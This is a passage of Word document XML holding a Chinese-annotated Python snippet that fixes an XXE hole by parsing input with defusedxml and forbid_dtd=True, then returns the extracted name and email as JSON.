        <w:t>修复方案（defusedxml）：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from defusedxml import minidom</w:t>
        <w:br/>
        <w:br/>
        <w:t># ✅ forbid_dtd=True 从源头禁止外部实体</w:t>
        <w:br/>
        <w:t>dom = minidom.parseString(raw_xml, forbid_dtd=True)</w:t>
        <w:br/>
        <w:t>name = dom.getElementsByTagName("name")[0].firstChild.data</w:t>
        <w:br/>
        <w:t>email = dom.getElementsByTagName("email")[0].firstChild.data</w:t>
        <w:br/>
        <w:t>return json.dumps({"name": name, "email": email})</w:t>
      </w:r>
    </w:p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